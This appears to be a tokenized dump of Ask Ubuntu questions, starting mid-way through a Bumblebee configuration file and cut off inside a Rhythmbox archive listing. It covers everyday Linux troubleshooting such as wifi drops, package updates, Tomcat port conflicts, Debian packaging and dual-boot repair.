. set to false if the card shoud be on when bumblebee server exits . turncardoffatexit=false the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will be ignored . noecomodeoverride=false the driver used by bumblebee server . if this value is not set ( or empty ) , auto-detection is performed . the available drivers are nvidia and nouveau ( see also the driver-specific sections below ) driver= directory with a dummy config file to pass as a -configdir to secondary x xorgconfdir=/etc/bumblebee/xorg.conf.d client options . will take effect on the next optirun executed . [ optirun ] acceleration/ rendering bridge , possible values are auto , virtualgl and primus . bridge=auto the method used for virtualgl to transport frames between x servers . possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy list of paths which are searched for the primus libgl.so.1 when using the primus bridge primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus should the program run under optirun even if bumblebee server or nvidia card is not available ? allowfallbacktoigc=false driver-specific settings are grouped under [ driver-name ] . the sections are parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- detection resolves to name ) . pmmethod : method to use for saving power by disabling the nvidia card , valid values are : auto - automatically detect which pm method to use bbswitch - new in bb 3 , recommended if available switcheroo - vga_switcheroo method , use at your own risk none - disable pm completely https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] module name to load , defaults to driver if empty or unset kerneldriver=nvidia-331 pmmethod=auto colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-331 : /usr/lib32/nvidia-331 comma-separated path of the directory containing nvidia_drv.so and the default xorg modules path xorgmodulepath=/usr/lib/nvidia-331/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau if you need something else just ask ... thanks ! : ) and sry for my bad english : )
424594	kubuntu and play on linux , file associations	i am trying to associate files with notepad++ running under playonlinux on kubuntu 13.10 . ( yes , i am aware that there are plenty of equivalent programs that may be used in kubuntu . the reason i want to use notepad++ is because we are using it at university and i want consistency ) i have followed the instructions in this article , right up to the point where it says to open with other applications . but i do not see notepad++ listed anywhere on the list . how do i add it to the list of applications ( categories ) in kubuntu ?
424595	how to find which packages from official ubuntu repositories need to be updated ( in respect to current state ) ?	how to determine which packages from official ubuntu repositories need to be updated ( in respect to current state ) and to download these packages thanks . hey denarsson , your script was very helpful thank you . the command apt-get update -o dir : :etc : :sourcelist='sources.list ' \ -o dir : :etc : :sourceparts='- ' -o apt : :get : :list-cleanup='0' update the package lists from official ubuntu repositories . yes it is fine but what equally i need first , before updating the data , is to see the list of packages ( name of packages ) from official ubuntu repositories that need to be update and after that to confirm to update . for example like this command : apt-get upgrade -- show-upgraded that print out a list of all packages that are to be upgraded . output : the following packages will be upgraded : apache2 apache2-mpm-prefork apache2-utils apache2.2-bin apache2.2-common apparmor apport apport-symptoms apt apt-transport-https apt-utils apt-xapian-index aptitude avahi-daemon cups-client cups-common cups-driver-gutenprint cups-filters cups-ppdc curl dbus dmsetup dnsutils dosfstools dovecot-core dovecot-imapd dovecot-pop3d dpkg file fontconfig-config âśâś . or for example with sudo /usr/lib/update-notifier/update-motd-updates-available out for ex : 35 packages can be updated . 22 updates are security updates . as output is the number of packages that can be updated but i need also to see the list of packages with the name for example . so which combination of command do you think is appropriate to print first the list of packages need to be updated and after that to confirm to update that list ? thank for your time .
424597	unzip a file weberp_4.11.3.zip	i have tried to use gunzip the aboce file on my ububtu server lts 12.04 but this does not work . i have tried to install unzip but get the following error message . benjamin @ ubuntu : /etc $ sudo apt-get install unzip [ sudo ] password for benjamin : reading package lists ... done building dependency tree reading state information ... done suggested packages : zip the following new packages will be installed : unzip 0 upgraded , 1 newly installed , 0 to remove and 5 not upgraded . need to get 184 kb of archives . after this operation , 383 kb of additional disk space will be used . warning : the following packages can not be authenticated ! unzip install these packages without verification [ y/n ] ? y err http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main unzip i386 6.0-4ubuntu2 something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/u/unzip/unzip_6.0- 4ubuntu2_i386.deb something wicked happened resolving 'us.archive.ubuntu.com : http ' ( -5 - no address associated with hostname ) e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? please assist
424599	wireless network always disconnect after 30 minutes	i 've recently installed xubuntu 12.04 on an old eeepc 1005pxd and everything seems good except the wireless network that keep disconnecting after approximatively 30 minutes of use . here it 's the result of several command that i 've found after some google 's searches . > caitlin @ caitlin-eee : ~ $ sudo lshw -c network [ sudo ] password forcaitlin : *-network description : interface réseau sans fil produit : ar9285 wireless network adapter ( pci-express ) fabriquant : qualcomm atheros identifiant matériel : 0 information bus : pci @ 0000:02:00.0 nom logique : wlan0 version : 01 numéro de série : e0 : b9 : a5 : cc:1f:21 bits : 64 bits horloge : 33mhz fonctionnalités : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-59-generic firmare=n/a ip=192.168.1.24 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn ressources : irq:17 mémoire : fbff0000-fbffffff *-network description : ethernet interface produit : ar8152 v2.0 fast ethernet fabriquant : qualcomm atheros identifiant matériel : 0 information bus : pci @ 0000:01:00.0 nom logique : eth0 version : c1 numéro de série : 14 : da : e9:02 : fa:0f capacité : 100mbit/s bits : 64 bits horloge : 33mhz fonctionnalités : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair ressources : irq:46 mémoire : f7fc0000-f7ffffff porte/s : ec00 ( taille=128 ) caitlin @ caitlin-eee : ~ $ lspci -nnk | grep -ia2 net 01:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8152 v2.0 fast ethernet [ 1969:2062 ] ( rev c1 ) subsystem : asustek computer inc. device [ 1043:8468 ] kernel driver in use : atl1c -- 02:00.0 network controller [ 0280 ] : qualcomm atheros ar9285 wireless netwo adapter ( pci-express ) [ 168c:002b ] ( rev 01 ) subsystem : azurewave aw-ne785 / aw-ne785h 802.11bgn wireless full or half-size mini pcie card [ 1a3b:1089 ] kernel driver in use : ath9k caitlin @ caitlin-eee : ~ $ dmesg | grep ath9k [ 16.947702 ] ath9k 0000:02:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 16.947725 ] ath9k 0000:02:00.0 : setting latency timer to 64 [ 17.210028 ] registered led device : ath9k-phy0 [ 226.713292 ] ath9k 0000:02:00.0 : restoring config space at offset 0xf ( was 0x1ff , writing 0x10a ) [ 226.713320 ] ath9k 0000:02:00.0 : restoring config space at offset 0x4 ( was 0x4 , writing 0xfbff0004 ) [ 226.713330 ] ath9k 0000:02:00.0 : restoring config space at offset 0x3 ( was 0x0 , writing 0x8 ) [ 226.713342 ] ath9k 0000:02:00.0 : restoring config space at offset 0x1 ( was 0x100000 , writing 0x100007 ) as far as i saw , i did n't found nothing helpful with that . does anyone have an idea of what 's my problem ? thx . mathieu .
424606	i 'm connected to wi-fi but ca n't see wireless networks after ubuntu netinstall	i 'm connected to wi-fi essid i 've set during the installation of ubuntu 13.04 netinstall , but i ca n't access any other wireless networks ( device not managed ) . furthermore , the network disconnects while turning laptop 's wi-fi button off and on again . nm-tool output networkmanager tool state : connected ( global ) - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ath9k state : unmanaged default : no hw address : 00:22:43 : a2:0f:8c capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : 00:24:21:63:81:08 capabilities : carrier detect : yes wired properties carrier : off iw-config output eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' polonez '' mode : managed frequency:2.462 ghz access point : 08:76 : ff : cb : be : d5 bit rate=48 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=61/70 signal level=-49 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:90 missed beacon:0 so far i 've tried sudo apt-get install -- reinstall linux-image- $ ( uname -r ) but it did n't help
424607	asked to remove packages when trying to install with muon ?	i keep trying to install packages using muon discover on kubuntu , but every time i try to install a package i get a message saying that there are other things installed that have to be removed . normally i would n't mind , but some of the things it claims have to be removed are things i am using ( like kdeutils and kdegames ) . why do i have to remove these things ? i only want to install vlc media player ! can i install this on kubuntu ?
424612	how to use the latest version of flash on ubuntu ?	we have all read about adobe 's decision to not care about linux users . i have several video websites ( things like tf1.fr and m6replay.fr that require an updated version of flash . i guess this is so for security reasons and for digital rights management . since the latest updated version of flash is no longer available for ubuntu , how can i use these websites ? i have tried chromium and google chrome , but that does not make a difference . is there some tool i can use ? or some or other bypass ? is someone working on a structural solution for this ?
424613	apache2 restart does not work when i navigate to it 's directory	this works : sudo /etc/init.d/apache2 restart it asks for my password , i enter it and apache restarts . then i try this : cd /etc/init.d sudo apache2 restart nope , it does n't work . apache displays usage info . why ca n't i navigate to the directory and do the restart . as must by now be obvious , i 'm absolutely a newbie . for what it 's worth i 'm using ubuntu 12.04
424616	problem when running smbclient ?	first i wish someone who is expert in samba4 ( domain controller ) guide me to solve my problem . after installing samba4 , i provisioned my domain and that was successful , in the installation guide there is a step to list share resources on my local-host ( netlogon , sysvol and ip $ ) , when i run smbclient i have this error : i search a lot for this problem and i did n't find a solution . any help please ?
424621	which files does gconf-editor edit ?	i want to change my gnome-terminal hotkey settings . i came across gconf-editor which enables me to customize exactly the things i need . however i need to know in which file these changes are made . the gconf-path is apps/gnome-terminal/keybindings/ i found the file ~/.gconf/apps/gnome-terminal/keybindigs . but there are only two hotkeys listet . where are the rest of these settings stored ?
424623	bumblebee issue with 13.10 and asus k56cb	i have an asus k56cb laptop with intel hd graphics 4000 and nvidia gt740 . i tried bumblebee to use them both ( normally i can use only the intel card ) . i followed 5 steps at https : //wiki.ubuntu.com/bumblebee for 13.10 . when i tried optirun firefox it gave me this error : [ 159.824254 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ 159.824357 ] [ error ] aborting because fallback start is disabled . after that my laptop started to make a lot of noise and after a while it shut itself down because of overheating . i checked the file `` xorg.conf.nvidia '' . when i executed lspci | egrep 'vga|3d ' it gave me these results : 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 3d controller : nvidia corporation gk107m [ geforce gt 740m ] ( rev ff ) busid for my nvidia card in `` xorg.conf.nvidia '' was correct . but there was no lines about intel card so i added these lines : section `` device '' identifier `` intel '' driver `` intel '' vendorname `` intel corporation '' busid `` pci:00:02:0 '' option `` probeallgpus '' `` false '' option `` nologo '' `` true '' option `` useedid '' `` false '' option `` usedisplaydevice '' `` none '' endsection after all of these , i rebooted my laptop and nothing changed . it still gives me the same error then starts heating . i 'm searching for weeks and i could n't find any working solution . does anyone have a working solution ? i do n't know much about ubuntu and linux i 've just started using them so if you have a solution , i would be really happy if you could explain it in basic steps .
424625	eclipse - starting tomcat 7 server at localhost has encountered a problem	i got this error just after getting an ubuntu error with eclipse and it forced to close the program . several ports ( 8005 , 8080 , 8009 ) required by tomcat v7.0 server at localhost are already in use . the server may already be running in another process , or a system process may be using the port . to start this server you will need to stop the other process or change the port number ( s ) . i got that error even after stopping manually the server $ > sudo /etc/init.d/tomcat7 stop * stopping tomcat servlet engine tomcat7 [ ok ] $ > sudo /etc/init.d/tomcat7 status * tomcat servlet engine is not running . what could i do without having to reboot the computer ? system details ubuntu 13.10 eclipse kepler service release 1 tomcat v 7.0.50
424630	reparing ubuntu installation using usb drive	i upgraded from ubuntu13.04 to ubuntu 13.10 and the process went very bad . many packages were broken because my internet connection failed and now , when i turn my computer on , it is very slow and many features do n't work ( like the internet or mounting external media ) . i tried rebooting with dpkg . it says many packages are broken , but i have no way to repair them . i would like to avoid reinstalling it completely since i can not create a backup for my data ( no external drive would mount ) . is there an easy and safe way to repair broken packages using a usb drive during the boot ?
424631	12.04 to 13.1 upgrade	i tried upgrading from 12.04 to 13.1 and was n't able to get anywhere . then i tried a fresh install of 13.1 which was even worse . from a usb stick , i got a purple screen with the red and white dots and then a black and white terminal prompt . i 'm using a ga-880gm-usb3 mother board which works fine for 12.04 . ideas ? thanks in advance for any thoughts .
424636	what can be done juju for wordpress users ? how to work with it ?	juju is important to shop online ? ... how to use it ? especially for user wordpress .. , i just hear juju associated with wordpress what is juju deploy wordpress ? enter link description here
424637	remote desktop connection from ubuntu to ubuntu	i am having two ubuntu13.10 machines in the same network and just want to access one machine from the other remotely . actually i opened the 'desktop sharing ' and i checked out all the necessary options and was trying to connect from the other machine using `` remote desktop viewer '' application and it is showing me one error message like `` an error occurred connection to host ipa.ddr.ess.000 was closed `` . ( i want to access the whole machine graphically not from terminal . this is happening if i use ssh in that ( remote desktop viewer ) application but if i use vnc i was able to connect ) . is there any solution for this ?
424638	download ubuntu for vmware	i am willing to download ubuntu for vmware..i 'm much confused among ubuntu server and ubuntu desktop , which one should i go for ? and what is the differnce between them ?
424640	how to enable rumble/vibrate on gamepad	i 've been trying to search for solutions for days now but still to no avail . it 's really starting to frustrate me . see i have this gamepad ( dragonrise inc. generic usb joystick ) which is functioning great except the rumble effect . i 've tried installing in on a windows system through vm and another in a windows pc and at both times , the rumble effect worked . but the thing is , even on the windows systems , the rumble effect needed a driver for it to work which i also installed on my ubuntu using wine . ( i 'm not sure if that 's the issue ) and on another note , when i was on windows , the emulator i was using to test the rumble effect ( dolphin ) there were two choices on the dropdown menu for installed joystick devices . one of which is `` dinput/0/usb vibration stick '' and the other one is `` sdl/0/usb vibration stick '' . both of them are my dragonrise joystick but if i chose the dinput , the rumble effect works , and if i chose the sdl it wont work . screenshot : when i went to try on the dolphin emulator in ubuntu , and clicked the dropdown menu , only the `` sdl '' appeared and there is no `` dinput '' on the choices . screenshot : my question , how do i install my gamepad on ubuntu so that the dinput will appear together with the sdl ? i have a feeling the rumble effect will work once it 's installed . sorry for the long post . i hope i will get a response soon . i 'm really getting frustrated . p.s . what are dinput and sdl anyway ?
424641	map my old hard drive to the same path in a new install	i have just done a fresh install on a new hdd and i want to map my old storage partition ( on my old disk ) . this means i wo n't have to re-do all my music libraries . the problem is that there is an `` extended partition '' in the place where i would put a link . i seem unable to delete it . what can i do ? error when trying to format : error creating file system : command-line `mkfs.ext4 -f -l `` sdaa2 '' `` /dev/sda2 '' ' exited with non-zero exit status 1 : mke2fs 1.42.8 ( 20-jun-2013 ) mkfs.ext4 : inode_size ( 128 ) * inodes_count ( 0 ) too big for a filesystem with 0 blocks , specify higher inode_ratio ( -i ) or lower inode count ( -n ) . ( udisks-error-quark , 0 )
424642	windows 7 can not start	i had recent problems installing ubuntu in my pc , sharing the disk with windows 7 . mouse and keyboard werenâ´t recognized during the installation in 64 bit . i partially solved the problem when i found out that they were working in the usb 3.0 ports . before this , i got desperated trying alternative ways of installing ubuntu , which includes installing it with the wubi utility and finally , from a livecd , overwritting this wubi installation . current situation looks like that : ubuntu starts perfectly after grub , no problems here . if i select windows in grub , it takes me to the windows boot manager which appeared after using wubi . it gives me 2 options : windows and ubuntu . when i choose windows , the windows loading screen appears for few seconds , flashes a blue screen and reboots . i 'd appreciate any help with this , cause i am `` a bit '' lost . edit : i 've already tried startup repair with the windows installation cd and the commands bootrec /fixmbr and bootrec /fixboot in the command prompt with identical results .
424646	will ubuntu installed using wubi be safe to use even after april 2014 , after windows xp 's eol ?	i 've a dual boot xp and ubuntu 12.04 , installed with windows installer . will ubuntu be safe after april 2014 ?
424647	how can i use my ubuntu server as a time capsule ?	apple 's time machine backup features backs up on to a time capsule , which is normally either a dedicated , apple-specific device , or some kind of network-attached storage formatted with hfs+ . i do n't have a nas , but i do have an ubuntu server with some big hard drives in it . how can i use this server as a time capsule ? note : there are some guides for doing this on the net , but they are out of date . they often recommend netatalk , but the version in ubuntu 13.10 ( 2.2.2 ) is well behind the current release ( 3.1.0 ) .
424650	te protocol ( itmss ) is n't associated with any program	how can i correct this ? firefox does n't know how to open this address , because the protocol ( itmss ) is n't associated with any program .
424651	black screen after upgrading to ubuntu 13.10 with gnome 3.10	i upgraded my ubuntu from 13.04 to 13.10 and my gnome from 3.8 to 3.10 . when i rebooted i chose ubuntu in the grub , then it showed the gnome logo for some seconds . after that the screen went black and i can not log in . i have rebooted a number of times to no avail . would someone please help me .
424652	packaging precompiled program : file list not found	i 'm trying to package an already compiled set of binaries including doc , header files , usage examples , etc ... the installation instruction of the original binaries recommends to just copy all files to a directory below /usr so i 've made the following debian/install : bin/* /usr/tigcc/bin doc/* /usr/tigcc/doc examples/* /usr/tigcc/examples include/* /usr/tigcc/include lib/* /usr/tigcc/lib projects/* /usr/tigcc/projects now i 'm using debuild -uc -us -sa to generate the .deb file . i 'm confronted with this error : dpkg-genchanges -sa > ../tigcc_0.95-0ubuntu2_amd64.changes dpkg-genchanges : fehler : dateienliste-datei kann nicht gelesen werden : datei oder verzeichnis nicht gefunden # translation : error : could n't read file list file : file or directory not found why am i getting this error ? what am i doing wrong ? edit : debian/rules # ! /usr/bin/make -f # -*- makefile -*- export dh_verbose=1 % : dh $ @ ( default from some packaging guide ) edit : ls -lhr debian debian : total 36k -rw-rw-r -- 1 sebastian sebastian 147 feb 22 15:45 changelog -rw-rw-r -- 1 sebastian sebastian 2 feb 21 23:46 compat -rw-rw-r -- 1 sebastian sebastian 454 feb 23 12:43 control -rw-rw-r -- 1 sebastian sebastian 1.2k feb 23 12:19 copyright -rw-rw-r -- 1 sebastian sebastian 148 feb 26 21:39 install -rw-rw-r -- 1 sebastian sebastian 102 feb 23 12:13 postinst -rw-rw-r -- 1 sebastian sebastian 79 feb 23 12:13 preinst -rwxr-xr-x 1 sebastian sebastian 85 feb 26 21:39 rules drwxrwxr-x 2 sebastian sebastian 4.0k feb 21 23:11 source debian/source : total 4.0k -rw-rw-r -- 1 sebastian sebastian 12 feb 21 23:11 format edit : i tried to create a file debian/files , just because i somehow thought it might help . the error vanished , but debuild just said `` nothing to build '' a few times and finished without generating a package at all . edit : following the request of one of the people trying to help me , i 'm now supplying links to the files used . the original binaries can be found here , the stuff below debian here . note : these link point directly to tar archives .
424653	android device connected to the hotspot , some apps can use the intenet , but most can not	i 've created the wi-fi hotspot with ap-hotspot to share my cable connection . it had been working properly for some time , but now it does n't . although i still can connect to the hotspot , most applications act is if there is no connection . audible client can download my books , but its shop screen never finishes loading . chrome 's auto-suggest works , but i ca n't load pages . play store says there is no connection , as do most other applications . i 've tried to recreate the hotspot using different interfaces , but it did n't help .
424663	how to get vlc working with my remote ?	ubuntu 12.04 , streamzap remote . i have lirc installed , and it can see buttons being pushed . i went to vlc , tools , preferences , show settings : all , interface , control interfaces an selected `` infrared remote control interface '' , then under infrared pointed it at ~/.lircrc i 've tried a few different recipes i found by googling , but vlc never blinks . i also found some references to starting vlc with a command-line argument to support remotes , but a ) would n't setting this in preferences do that ? and b ) i ca n't find a single `` do it this way '' ... everyone seems to have a different idea about how this should work , and all of the `` solutions '' seem to be highly qualified ( this worked for me , i do n't know why it does n't work for you ) or speculative ( i have n't done this myself , but this should work ! ) so ... how do i get vlc to see my remote ? nothing fancy , i 'll be happy with play and pause if nothing else !
424666	how to change your local ip ?	while i order a hp server for my ubuntu server , i am currently temporarily using my laptop as a server instead . i installed ubuntu 13.10 and other programs like webmin , etc , etc while being connected to my router through wi-fi . additionally , through a wi-fi connection , i have hosted numerous websites , game servers and an ftp server . the issue is that when i try to connect the laptop to the same router through ethernet , the local ip changes . this means that no services , such as webmin , work locally or publicly . when i go back to using wi-fi , the issue is solved , however , because the wi-fi connection can not maintain the traffic to and from the server , i need to use ethernet connection to keep up with the demand . i have portforwarded the ports i use from my wi-fi local ip to my ethernet local ip but i have no luck so far since the problem is on the local side , not from local to public . my question is , how can i configure my services to the new ip ? # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface # networkmanager # auto wlan0 # networkmanager # iface wlan0 inet dhcp # networkmanager # wpa-ssid routername # networkmanager # wpa-psk routerpassword the result of ip ad is : 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 : :1/128 scope host valid_lft forever preferred_lft forever 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc mq state up qlen 1000 link/ether 00:1c:23:3a:24 : db brd ff : ff : ff : ff : ff : ff inet 192.168.*** . ***/24 brd 192.168.1.255 scope global eth0 valid_lft forever preferred_lft forever inet 192.168.*** . ***/24 brd 192.168.1.255 scope global secondary eth0 valid_lft forever preferred_lft forever inet6 fe80 : :21c:23ff : fe3a:24db/64 scope link valid_lft forever preferred_lft forever 3 : wlan0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc mq state down qlen 1000 link/ether 00:19 : d2:03:0c : f8 brd ff : ff : ff : ff : ff : ff inet6 fe80 : :219 : d2ff : fe03 : cf8/64 scope link valid_lft forever preferred_lft forever result of ip r : default via 192.168.*** . *** dev eth0 proto static 192.168.*** . ***/24 dev eth0 proto kernel scope link src 192.168.*** . *** metric 1 results of sudo ethtool eth0 : settings for eth0 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/half 1000baset/full advertised pause frame use : symmetric advertised auto-negotiation : yes link partner advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full link partner advertised pause frame use : symmetric receive-only link partner advertised auto-negotiation : yes speed : 100mb/s duplex : full port : twisted pair phyad : 1 transceiver : internal auto-negotiation : on mdi-x : off supports wake-on : g wake-on : g current message level : 0x000000ff ( 255 ) drv probe link timer ifdown ifup rx_err tx_err link detected : yes
424667	ubuntu 13.10 - virtualbox win7 x86 ? or win7 x64 ?	i have installed ubuntu 13.10 in my sony vaio and got rid of win8 : p now at work ; i need to use some software in windows ; so i guess the best idea is to install a virtualbox - win7 machine . my question is : should i install win x86 ? ? x64 ? ? which one will run faster and consume fewer resources ? ?
424669	how to get my 3g zte mf xxx / prolink phs xxx dongle working in linux	some of these devices either are n't naturally detected or are not usable in ubuntu and other gnu/linux operating systems .
424675	rhythmbox 2.99.1 in 12.10	i 've tried installing rhythmbox 2.99.1 using the .tar.xz from saucy on launchpad and i seem to be getting errors about dependencies . does anyone know a good way to fix these dependencies issues ? i tried installing it agian with extra instructions and here is what i got . note that the terminal cut off me cding , extracting . rhythmbox-2.99.1/help/it/it.po rhythmbox-2.99.1/help/el/ rhythmbox-2.99.1/help/el/fdl-appendix.xml rhythmbox-2.99.1/help/el/legal.xml rhythmbox-2.99.1/help/el/index.docbook rhythmbox-2.99.1/help/el/figures/ rhythmbox-2.99.1/help/el/figures/rb-toolbar.png rhythmbox-2.99.1/help/el/figures/rb-window-small.png rhythmbox-2.99.1/help/el/figures/rb-statusbar.png rhythmbox-2.99.1/help/el/figures/rb-toolbar-prevplaynext.png rhythmbox-2.99.1/help/el/figures/rb-toolbar-repeat.png rhythmbox-2.99.1/help/el/figures/rb-toolbar-shuffle.png rhythmbox-2.99.1/help/el/figures/rb-iradio-main.png rhythmbox-2.99.1/help/el/figures/rb-window.png rhythmbox-2.99.1/help/el/el.po rhythmbox-2.99.1/help/el/el.stamp rhythmbox-2.99.1/help/cs/ rhythmbox-2.99.1/help/cs/fdl-appendix.xml rhythmbox-2.99.1/help/cs/legal.xml rhythmbox-2.99.1/help/cs/index.docbook rhythmbox-2.99.1/help/cs/cs.stamp rhythmbox-2.99.1/help/cs/cs.po rhythmbox-2.99.1/help/zh_cn/ rhythmbox-2.99.1/help/zh_cn/fdl-appendix.xml rhythmbox-2.99.1/help/zh_cn/legal.xml rhythmbox-2.99.1/help/zh_cn/zh_cn.po rhythmbox-2.99.1/help/zh_cn/zh_cn.stamp rhythmbox-2.99.1/help/zh_cn/index.docbook rhythmbox-2.99.1/help/zh_cn/figures/ rhythmbox-2.99.1/help/zh_cn/figures/rb-toolbar.png rhythmbox-2.99.1/help/zh_cn/figures/rb-window-small.png rhythmbox-2.99.1/help/zh_cn/figures/rb-volume-changer.png rhythmbox-2.99.1/help/zh_cn/figures/rb-statusbar.png rhythmbox-2.99.1/help/zh_cn/figures/rb-toolbar-prevplaynext.png rhythmbox-2.99.1/help/zh_cn/figures/rb-toolbar-repeat.png rhythmbox-2.99.1/help/zh_cn/figures/rb-toolbar-shuffle.png rhythmbox-2.99.1/help/zh_cn/figures/rb-notification-window.png rhythmbox-2.99.1/help/zh_cn/figures/rb-iradio-main.png rhythmbox-2.99.1/help/zh_cn/figures/rb-notification-area-menu.png rhythmbox-2.99.1/help/zh_cn/figures/rb-window.png rhythmbox-2.99.1/help/de/ rhythmbox-2.99.1/help/de/fdl-appendix.xml rhythmbox-2.99.1/help/de/legal.xml rhythmbox-2.99.1/help/de/de.po rhythmbox-2.99.1/help/de/index.docbook rhythmbox-2.99.1/help/de/figures/ rhythmbox-2.99.1/help/de/figures/rb-toolbar.png rhythmbox-2.99.1/help/de/figures/rb-window-small.png rhythmbox-2.99.1/help/de/figures/rb-volume-changer.png rhythmbox-2.99.1/help/de/figures/rb-statusbar.png rhythmbox-2.99.1/help/de/figures/rb-toolbar-prevplaynext.png rhythmbox-2.99.1/help/de/figures/rb-toolbar-repeat.png rhythmbox-2.99.1/help/de/figures/rb-toolbar-shuffle.png rhythmbox-2.99.1/help/de/figures/rb-notification-window.png rhythmbox-2.99.1/help/de/figures/rb-podcast-main.png rhythmbox-2.99.1/help/de/figures/rb-iradio-main.png rhythmbox-2.99.1/help/de/figures/rb-notification-area-menu.png rhythmbox-2.99.1/help/de/figures/rb-window.png rhythmbox-2.99.1/help/de/de.stamp rhythmbox-2.99.1/help/c/ rhythmbox-2.99.1/help/c/fdl-appendix.xml rhythmbox-2.99.1/help/c/legal.xml rhythmbox-2.99.1/help/c/index.docbook rhythmbox-2.99.1/help/c/figures/ rhythmbox-2.99.1/help/c/figures/rb-toolbar.png rhythmbox-2.99.1/help/c/figures/rb-window-small.png rhythmbox-2.99.1/help/c/figures/rb-volume-changer.png rhythmbox-2.99.1/help/c/figures/rb-statusbar.png rhythmbox-2.99.1/help/c/figures/rb-toolbar-prevplaynext.png rhythmbox-2.99.1/help/c/figures/rb-toolbar-repeat.png rhythmbox-2.99.1/help/c/figures/rb-notification-zone.png rhythmbox-2.99.1/help/c/figures/rb-toolbar-shuffle.png rhythmbox-2.99.1/help/c/figures/rb-notification-window.png rhythmbox-2.99.1/help/c/figures/rb-podcast-main.png rhythmbox-2.99.1/help/c/figures/rb-iradio-main.png rhythmbox-2.99.1/help/c/figures/rb-notification-area-menu.png rhythmbox-2.99.1/help/c/figures/rb-window.png rhythmbox-2.99.1/help/da/ rhythmbox-2.99.1/help/da/fdl-appendix.xml rhythmbox-2.99.1/help/da/legal.xml rhythmbox-2.99.1/help/da/da.po rhythmbox-2.99.1/help/da/da.stamp rhythmbox-2.99.1/help/da/index.docbook rhythmbox-2.99.1/help/sv/ rhythmbox-2.99.1/help/sv/fdl-appendix.xml rhythmbox-2.99.1/help/sv/legal.xml rhythmbox-2.99.1/help/sv/index.docbook rhythmbox-2.99.1/help/sv/sv.po rhythmbox-2.99.1/help/sv/sv.stamp rhythmbox-2.99.1/help/sv/figures/ rhythmbox-2.99.1/help/sv/figures/rb-toolbar.png rhythmbox-2.99.1/help/sv/figures/rb-window-small.png rhythmbox-2.99.1/help/sv/figures/rb-statusbar.png rhythmbox-2.99.1/help/sv/figures/rb-toolbar-prevplaynext.png rhythmbox-2.99.1/help/sv/figures/rb-notification-window.png rhythmbox-2.99.1/help/sv/figures/rb-podcast-main.png rhythmbox-2.99.1/help/sv/figures/rb-iradio-main.png rhythmbox-2.99.1/help/sv/figures/rb-notification-area-menu.png rhythmbox-2.99.1/help/sv/figures/rb-window.png rhythmbox-2.99.1/help/gl/ rhythmbox-2.99.1/help/gl/fdl-appendix.xml rhythmbox-2.99.1/help/gl/legal.xml rhythmbox-2.99.1/help/gl/gl.po rhythmbox-2.99.1/help/gl/gl.stamp rhythmbox-2.99.1/help/gl/index.docbook rhythmbox-2.99.1/help/es/ rhythmbox-2.99.1/help/es/fdl-appendix.xml rhythmbox-2.99.1/help/es/legal.xml rhythmbox-2.99.1/help/es/es.po rhythmbox-2.99.1/help/es/index.docbook rhythmbox-2.99.1/help/es/figures/ rhythmbox-2.99.1/help/es/figures/rb-toolbar.png rhythmbox-2.99.1/help/es/figures/rb-window-small.png rhythmbox-2.99.1/help/es/figures/rb-volume-changer.png rhythmbox-2.99.1/help/es/figures/rb-statusbar.png rhythmbox-2.99.1/help/es/figures/rb-toolbar-prevplaynext.png rhythmbox-2.99.1/help/es/figures/rb-notification-window.png rhythmbox-2.99.1/help/es/figures/rb-podcast-main.png rhythmbox-2.99.1/help/es/figures/rb-iradio-main.png rhythmbox-2.99.1/help/es/figures/rb-notification-area-menu.png 